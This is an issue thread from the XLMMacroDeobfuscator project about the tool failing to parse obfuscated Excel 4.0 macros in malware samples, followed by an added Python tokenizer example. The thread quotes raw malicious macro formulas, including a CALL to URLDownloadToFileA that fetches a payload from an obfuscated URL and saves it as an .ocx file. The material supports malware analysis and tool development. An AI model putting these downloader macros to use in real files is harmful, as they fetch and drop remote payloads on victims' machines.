DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars, 116 forks

Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111

Open cccs-jh opened 2 years ago

cccs-jh commented 2 years ago

Running xlmdeobfuscator on this file: https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1 gives the following error:

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'KBRSBTL'!$J$1
[Starting Deobfuscation]
CELL:J12 , FullEvaluation , "False"
Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69. Expected one of:

The raw XLM macro, as extracted by olevba, is:

' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: KBRSBTL, Macrosheet
' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1

kirk-sayre-work commented 2 years ago

https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:

  1. Things like '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http=TEXT(((((((((("s"&":/")&"/m-a")&"in")&"su")&"ra")&"nc")&"e.c")&"o")&"m/w")&"p-a",25352.0)=TEXT((((((((("d"&"m")&"i")&"n/OR")&"iP")&"BS")&"tK")&"NO")&"nI")&"V/",3646.0)","..\udh1.ocx",0,0)' are not parsing because the double quotes in the TEXT() expressions in the "http=..." string are not escaped as '""', so the string is invalid.
  2. The next problem (I wrote a hacky patch in my local XLMMacroDeobfuscator to get past the 1st problem) is that the TEXT() expressions that appear inside the "http=..." string are not emulated, they just remain as-is in the string. I'm not familiar enough with XLM macros to know whether XLM formula calls are supposed to be resolved inside string literals or not, but it looks like maybe they do get resolved?
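An added illustration of the first problem described in the thread, written for this page and not taken from XLMMacroDeobfuscator or from either commenter: in an Excel formula a double quote inside a string literal has to be doubled (`""`), so a lexer that applies that rule closes the `"http=TEXT(...` literal of the quoted CALL() formula at the first bare quote and then finds an operand (`s`) directly after another operand, which is the point at which a grammar reports an unexpected token. The "lenient" rule below is this example's own recovery heuristic (close a literal only at a quote that is followed by `,` or `)` once every `(` seen inside the literal has been balanced); it is not the project's fix or the patch mentioned above. The formula is copied from the comment as constructed test input; the second, well-formed formula is constructed.

```python
"""Strict versus lenient reading of XLM string literals (added example)."""

import re

# Copied from the comment above as constructed test input.
ISSUE_FORMULA = (
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
    '"http=TEXT(((((((((("s"&":/")&"/m-a")&"in")&"su")&"ra")&"nc")&"e.c")&"o")'
    '&"m/w")&"p-a",25352.0)=TEXT((((((((("d"&"m")&"i")&"n/OR")&"iP")&"BS")&"tK")'
    '&"NO")&"nI")&"V/",3646.0)","..\\udh1.ocx",0,0)'
)

# Constructed well-formed counterpart: the inner quotes are doubled.
WELL_FORMED = '=CALL("a","say ""hi""",1)'

_TOKEN_RE = re.compile(
    r"(?P<NUMBER>\d+(?:\.\d+)?)"
    r"|(?P<NAME>[A-Za-z_][A-Za-z0-9_.]*)"
    r"|(?P<OP>[-+*/&=<>:,()!])"
    r"|(?P<WS>\s+)"
)


def read_string(formula, start, lenient=False):
    """Return the index just past the string literal opening at formula[start].

    Strict (Excel's rule): a doubled quote is an escaped quote, any other
    quote closes the literal.  Lenient (this example's heuristic): a single
    quote closes the literal only when it is followed by ',' or ')' or the
    end of input and the parentheses seen inside the literal are balanced.
    """
    assert formula[start] == '"', "not at a string literal"
    i, inner = start + 1, 0
    while i < len(formula):
        ch = formula[i]
        nxt = formula[i + 1] if i + 1 < len(formula) else ""
        if ch == '"':
            if nxt == '"':  # "" is an escaped quote: stay inside the literal
                i += 2
                continue
            if not lenient or (inner == 0 and nxt in (",", ")", "")):
                return i + 1
        elif lenient and ch == "(":
            inner += 1
        elif lenient and ch == ")":
            inner = max(0, inner - 1)
        i += 1
    raise ValueError("unterminated string literal at offset %d" % start)


def unquote(token):
    """Value of a string token: strip the delimiters and undouble quotes."""
    return token[1:-1].replace('""', '"')


def tokenize(formula, lenient=False):
    """Return [(kind, text, offset), ...] with kind STRING, NUMBER, NAME or OP."""
    tokens, i = [], 0
    while i < len(formula):
        if formula[i] == '"':
            end = read_string(formula, i, lenient)
            tokens.append(("STRING", formula[i:end], i))
            i = end
            continue
        m = _TOKEN_RE.match(formula, i)
        if not m:
            raise ValueError("unexpected character %r at offset %d" % (formula[i], i))
        if m.lastgroup != "WS":
            tokens.append((m.lastgroup, m.group(), i))
        i = m.end()
    return tokens


def first_syntax_error(tokens):
    """Offset of the first operand that directly follows another operand with
    no operator in between (a minimal stand-in for a grammar's 'unexpected
    token'), or None when no such pair exists."""
    operand = {"STRING", "NUMBER", "NAME"}
    for prev, cur in zip(tokens, tokens[1:]):
        if prev[0] == "NAME" and cur[1] == "(":
            continue  # a function call such as TEXT( is fine
        prev_ends = prev[0] in operand or prev[1] == ")"
        cur_starts = cur[0] in operand or cur[1] == "("
        if prev_ends and cur_starts:
            return cur[2]
    return None


def analyze(formula, lenient=False):
    """Tokenize under one rule and report the first error plus the string values."""
    tokens = tokenize(formula, lenient)
    return {
        "error_offset": first_syntax_error(tokens),
        "strings": [unquote(t[1]) for t in tokens if t[0] == "STRING"],
    }


if __name__ == "__main__":
    for label, lenient in (("strict", False), ("lenient", True)):
        r = analyze(ISSUE_FORMULA, lenient)
        print(label, "error at offset", r["error_offset"], "strings:", len(r["strings"]))
```

Under the strict rule the formula yields an error right after the truncated `"http=TEXT(((((((((("` literal, while the lenient rule returns the whole `http=TEXT(...)=TEXT(...)` text as the fifth argument of CALL, leaving the second problem from the thread (whether the TEXT() calls inside that text should be evaluated) untouched.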